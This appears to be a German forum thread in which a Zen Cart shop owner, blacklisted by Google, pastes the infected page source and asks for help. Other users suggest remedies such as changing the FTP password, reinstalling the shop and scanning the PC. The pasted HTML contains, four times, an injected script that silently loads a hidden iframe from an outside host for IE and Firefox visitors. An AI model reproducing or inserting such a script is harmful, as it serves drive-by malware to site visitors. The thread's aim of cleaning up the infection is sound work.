Malware im Webshop, code nicht auffindbar

Unregistriert

hallo,
ich bin schon total verzweifelt und ich hoffe, dass sich hier irgendjemand findet, der mir helfen kann, ich wäre unglaublich dankbar!
ich habe von google die info bekommen, dass sich in meinem webshop malware befindet und dass die page vorübergehend geblacklistet wurde.
der code ist:

ich habe diesen schon stundenlang gesucht aber in keiner der dateien auf dem server gefunden.
wie man sieht kommt der code öfters vor und es wäre toll wenn mir dadaurch vl jemad sagen könnte wo dieser code versteckt sein könnte, der quellcode von einer der seiten lautet:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de">
<head>
<title>Legendary Products</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="Noproblem Ion Balance Legendary Products energie, geschenke, moderner schmuck, online " />
<meta name="description" content="Legendary Products : - Noproblem Ion Balance Legendary Products energie, geschenke, moderner schmuck, online" />
<meta http-equiv="imagetoolbar" content="no" />
<meta name="author" content="The Zen-Cart team and others" />
<meta name="generator" content="Zen-Cart - deutsche Version, http://www.zen-cart.at" />

<div class="topper-menu float-right">
<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script></div>

<div id="logoWrapper">
<div id="logo"><a href="http://www.legendary-products.at//"><img src="includes/templates/viennabright/images/logo.gif" alt="powered by Zen-Cart 1.3.9" title=" powered by Zen-Cart 1.3.9 " width="970" height="110" /></a></div>
</div>
<div class="clearBoth"></div>

<div id="navCatTabsWrapper">
<div id="navCatTabs">
<ul>
<li><a class="category-top" href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Ion Balance</a> </li>
<li><a class="category-top" href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Legendary Products</a> </li>
</ul>
</div>
</div>

<li class="tab_nonactive"><a href="index.php?main_page=products_new">Neue Artikel</a></li>

<li class="tab_nonactive"><a href="index.php?main_page=specials">Sonderangebote</a></li>

<li class="tab_nonactive"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Mein Konto</a></li>

<li class="tab_nonactive"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Warenkorb</a></li>
</ul>
</div>

<div id="login_logout_section" class="float-right">
<ul class="list-style-none inline-list">
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Anmelden</a>
oder <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Registrieren</a></li> </ul>

</div>
</div>

<div id="tools_wrapper" class="align-center">
<table cellpadding="0" cellspacing="0" width="100%">
<tr>
<td class="td-search-header">
<div class="search-header float-left">
<form name="quick_find_header" action="http://www.legendary-products.at//index.php?mai…d_search_result" method="get"><input type="hidden" name="main_page" value="advanced_search_result" /><input type="hidden" name="search_in_description" value="1" /><input type="hidden" name="zenid" value="uis7it89mec5ivurbukgppm072" /><div class="search-header-input"><input type="text" name="keyword" size="6" maxlength="30" style="width: 138px" value="Suche nach..." onfocus="if (this.value == 'Suche nach...') this.value = '';" onblur="if (this.value == '') this.value = 'Suche nach...';" /></div><input class="button-search-header" type="image" src="includes/templates/viennabright/images/search_header_button.gif" value="Serch" /></form> <div class="advanced_search float-left">
<a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Erweiterte Suche</a>
</div>
</div>
</td>
<td>

<table class="align-center cart-header">
<tr>
<td>
<div id="cartBoxEmpty"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img class="cart-icon empty float-left" src="includes/templates/viennabright/images/spacer.gif" alt="" /></a>Ihr Warenkorb ist leer.</div>
</td>
</tr>
</table>

</td>
<td class="td-languages">
<div class="languages-wrapper">

<form name="currencies_form" action="http://www.legendary-products.at//index.php?main_page=index" method="get"><select name="currency" onchange="this.form.submit();">
<option value="EUR" selected="selected">Euro</option>
</select>
<input type="hidden" name="main_page" value="index" /><input type="hidden" name="zenid" value="uis7it89mec5ivurbukgppm072" /></form> <label class="float-right">  Währung:</label>

<form name="lang_form" action="http://www.legendary-products.at//index.php?main_page=index" method="get"><select name="language" onchange="this.form.submit();">
<option value="en">English</option>
<option value="de" selected="selected">Deutsch</option>
</select>
<input type="hidden" name="main_page" value="index" /><input type="hidden" name="zenid" value="uis7it89mec5ivurbukgppm072" /></form> <label class="float-right">Sprache:</label>

</div>

<td id="navColumnOne" class="columnLeft" style="width: 150px">
<div id="navColumnOneWrapper" style="width: 155px">
<div class="leftBoxContainer" id="categories" style="width: 155px">
<div class="sidebox-header-left main-sidebox-header-left"><h3 class="leftBoxHeading main-sidebox-header-right" id="categoriesHeading">Kategorien</h3></div>
<div id="categoriesContent" class="sideBoxContent">
<div class="categories-top-list no-dots"><a class="category-top" href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Ion Balance-></a><span class="sub-count"> (51)</span></div>
<div class="categories-top-list "><a class="category-top" href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Legendary Products</a><span class="sub-count"> (3)</span></div>
<hr id="catBoxDivider" />
<a class="category-links" href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Neue Artikel ...</a><br />
<a class="category-links" href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Alle Artikel ...</a>
</div></div>


<div class="leftBoxContainer" id="information" style="width: 155px">
<div class="sidebox-header-left "><h3 class="leftBoxHeading " id="informationHeading">Information</h3></div>
<div id="informationContent" class="sideBoxContent">
<ul style="margin: 0; padding: 0; list-style-type: none;">
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Preise und Versand</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Datenschutz</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">AGB</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Widerrufsrecht</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Impressum</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Kontakt</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Site Map</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Geschenkgutschein FAQ</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Aktionskupon</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Newsletter abbestellen</a></li>
</ul>
</div></div>


<div class="leftBoxContainer" id="bestsellers" style="width: 155px">
<div class="sidebox-header-left "><h3 class="leftBoxHeading " id="bestsellersHeading">Top Artikel</h3></div>
<div id="bestsellersContent" class="sideBoxContent">
<div class="wrapper">
<ol>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Ion Balance Dion Serie...</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Ion Balance Dion Serie...</a></li>
<li><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">USB-Stick, 8GB, in Schlüsselform</a></li>
</ol>
</div>
</div></div>

</div></td>
<td id="columnCenter" valign="top">

<SCRIPT LANGUAGE="JavaScript">
<!--

/*
Script by FPMC at http://jsarchive.8m.com
Submitted to JavaScript Kit (http://javascriptkit.com)
For this and 400+ free scripts, visit http://javascriptkit.com
*/

//set image paths
src = ['http://www.legendary-products.at/images/slide3_ge.jpg',
'http://www.legendary-products.at/images/slide2_ge.jpg',
'http://www.legendary-products.at/images/slide1.jpg']

//set corresponding urls
url = ['http://www.legendary-products.at/index.php?main_page=page_3',
'http://www.legendary-products.at/index.php?main_page=page_2',
'http://www.facebook.com/legendaryproducts']

//set duration for each image
duration = 5;

//Please do not edit below
ads=[]; ct=0;
function switchAd() {
var n=(ct+1)%src.length;
if (ads[n] && (ads[n].complete ads[n].complete==null)) {
document['Ad_Image'].src = ads[ct=n].src;
}
ads[n=(ct+1)%src.length] = new Image;
ads[n].src = src[n];
setTimeout("switchAd()",duration*1000);
}
function doLink(){
location.href = url[ct];
} onload = function(){
if (document.images)
switchAd();
}
//-->
</SCRIPT>
<A HREF="javascript:doLink();" onMouseOver="status=url[ct];return true;"
onMouseOut="status=''">
<IMG NAME="Ad_Image" SRC="http://www.legendary-products.at/images/slide3_ge.jpg" BORDER=0>
</A>

<p></p>

</div></div>

<div class="centerBoxWrapper" id="whatsNew">
<h2 class="centerBoxHeading">Neue Artikel im Juli</h2>
<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/d002.jpg" alt="Noproblem Ion Balance Dion Serie Armband D002" title=" Noproblem Ion Balance Dion Serie Armband D002 " width="80" height="80" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Ion Balance Dion Serie Armband D002</a><br />€64.90<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/d023.jpg" alt="Noproblem D.ion Health Halsband D023" title=" Noproblem D.ion Health Halsband D023 " width="80" height="80" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem D.ion Health Halsband D023</a><br />€49.90<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/UM100.png" alt="USB-Stick, 8GB, in Schlüsselform" title=" USB-Stick, 8GB, in Schlüsselform " width="100" height="67" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">USB-Stick, 8GB, in Schlüsselform</a><br />€11.99<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<br class="clearBoth" />

<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/clock.png" alt="ION Sportuhr" title=" ION Sportuhr " width="100" height="77" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">ION Sportuhr</a><br />€8.90<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/magicmat.png" alt="Magic Mat; Anti-rutsch Matte für Handys etc." title=" Magic Mat; Anti-rutsch Matte für Handys etc. " width="100" height="52" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Magic Mat; Anti-rutsch Matte für Handys etc.</a><br />€4.50<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/P07307.png" alt="Noproblem Sportarmband P07307, grau/blau" title=" Noproblem Sportarmband P07307, grau/blau " width="80" height="80" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Sportarmband P07307, grau/blau</a><br />€19.90<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<br class="clearBoth" />

<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/P07301.png" alt="Noproblem Sportarmband P07301, schwarz" title=" Noproblem Sportarmband P07301, schwarz " width="80" height="80" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Sportarmband P07301, schwarz</a><br />€19.90<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/p068.jpg" alt="Noproblem Ion Balance Halsband P068" title=" Noproblem Ion Balance Halsband P068 " width="100" height="75" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Ion Balance Halsband P068</a><br />€38.90<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<div class="centerBoxContentsNew centeredContent back" style="width:33%;"><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072"><img src="images/p035.jpg" alt="Noproblem Ion Balance Armband P035" title=" Noproblem Ion Balance Armband P035 " width="80" height="80" /></a><br /><a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Noproblem Ion Balance Armband P035</a><br />€49.90<br/><span class="taxAddon">inkl. 20% MwSt.<br/> zzgl. <a href="http://www.legendary-products.at//index.php?mai…5ivurbukgppm072">Versandkosten</a></span></div>
<br class="clearBoth" />

</div>

</div>
</td>

<td id="navColumnTwo" class="columnRight" style="width: 150px">
<div id="navColumnTwoWrapper" style="width: 222px">
<div class="rightBoxContainer" id="fanboxsidebox" style="width: 222px">
<div class="sidebox-header-left"><h3 class="rightBoxHeading" id="fanboxsideboxHeading">Sind Sie bereits ein Fan?</h3></div>
<div id="fanboxsideboxContent" class="sideBoxContent"><p><fb:like-box href="http://www.facebook.com/legendaryproducts" width="190" height="520" show_faces="true" stream="true" header="false"></fb:like-box></p></div></div>

</div></td></tr>
</table>
<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>

<div id="navSuppWrapper">

<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>

<div id="siteinfoLegal" class="legalCopyright">Copyright © 2012 <a href="http://www.zen-cart.at" target="_blank">Zen Cart</a>. Powered by <a href="http://www.zen-cart.at" target="_blank">Zen Cart</a></div> <br/>

<div id="siteinfoIP">Aus Sicherheitsgründen werden bei jeder Bestellung die IP-Adressen gespeichert.<br />Ihre IP Adresse lautet: 80.123.36.64</div>
<div class="clearBoth"></div>

</div>




</div>

window.fbAsyncInit = function() {
FB.init({appId: 'your app id', status: true, cookie: true,
xfbml: true});
};
(function() {
var e = document.createElement('script'); e.async = true;
e.src = document.location.protocol +
'//http://connect.facebook.net/en_US/all.js';
document.getElementById('fb-root').appendChild(e);
});

</script>

</body> <script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script></html>

Bandit

Es dürfte für uns absolut unmöglich sein, das herauszufinden. Denn woher sollen wir wissen, mit was für einem System du arbeitest, welche Dateien eine Rolle spielen oder ob das sogar aus einer Datenbank kommt. Die einfachste Lösung dürfte sein, ein Backup einzuspielen, wenn man denn eins hat (was ja eigentlich selbstverständlich sein sollte)

admin

Ist definitiv auf dem Server !

Als erstes musst du dir Gedanken machen, woher das Problem kommt.
Eventuell hast du LOKAL einen Wurm, der dir FTP Passwörter ausspäht, oder der Shop ist nicht in der neusten Version installiert und deswegen besteht eventuell ein Sicherheitslücke.

Überprüfe erst mal deinen Rechner auf Herz und Nieren mit der neusten Virensoftware
Ich empfehle neben den Scan deines Rechners auch noch das Tool HijackThis

HijackThis - Download - CHIP Online http://www.chip.de/downloads/HijackThis_13011934.html

und hier kannst du deine Logfile aus dem PC Scan auswerten alsssen
HijackThis Logfileauswertung http://www.hijackthis.de/

Wenn alles sauber ist unbedingt das ftp Passwort ändern und die Datenbank sichern.

Wenn dein Webserver eine FTP Log Verzeichnis hat kannst du ersehen welche Daten geändert wurden und dies gegen die original Shopdateien ersetzen.
Wenn nicht, den Shop neu installieren und anschließend das Backup der Datenbank wieder einspielen.

Aber wie gesagt, musst Du erst die Sicherheitslücke finden, wie der Angreifer an dein FTP Passwort gekommen ist oder wenn deine Dateien Schreibrechte besitzen, woher die Sicherheitslücke kommt.
Ich Tippe mal auf FTP Zugang wurde ausgespäht oder dein Passwort hat nur 8 Zeichen

mike_007

Welches ftp Programm verwendest du?

Unregistriert

hi,
vielen dank für die antworten, anscheinend werde ich ohnehin nicht drumrum kommen das ganze neu zu installieren, bedeutet wohl die ganze nacht arbeit
ich verwende ftp voyager!

Bandit

Du solltest auf jeden Fall deinen Rechner checken. Nicht dass du einen Trojaner drauf hast, denn passiert das ruckzuck wieder.

mike_007

Ich würde das ftp passwort nie direkt im programm speichern - schreibs dir lieber auf einen zettel!

synaptic

wenn du plesk als server-administrationsoberfläche hast oder dein webspace-anbieter des teil nutzt wirste in deinem webspace ein blackhole-0-exploit haben!
das teil is derzeit im umlauf und sorgt dafür, das "runforestrun" verbreitet wird. der wiederum befällt nur windows-rechner und is die vorstufe für ein botnet (soweit ich es bisher erfahren habe)
des ding wird ab anfang august oder so richtig laufen und für Sorgen sorgen.

http://sitecheck.sucuri.net/scanner/ lass den mal über deinen shop laufen

ich vermute mal du hast infizierte javascript-files

Tags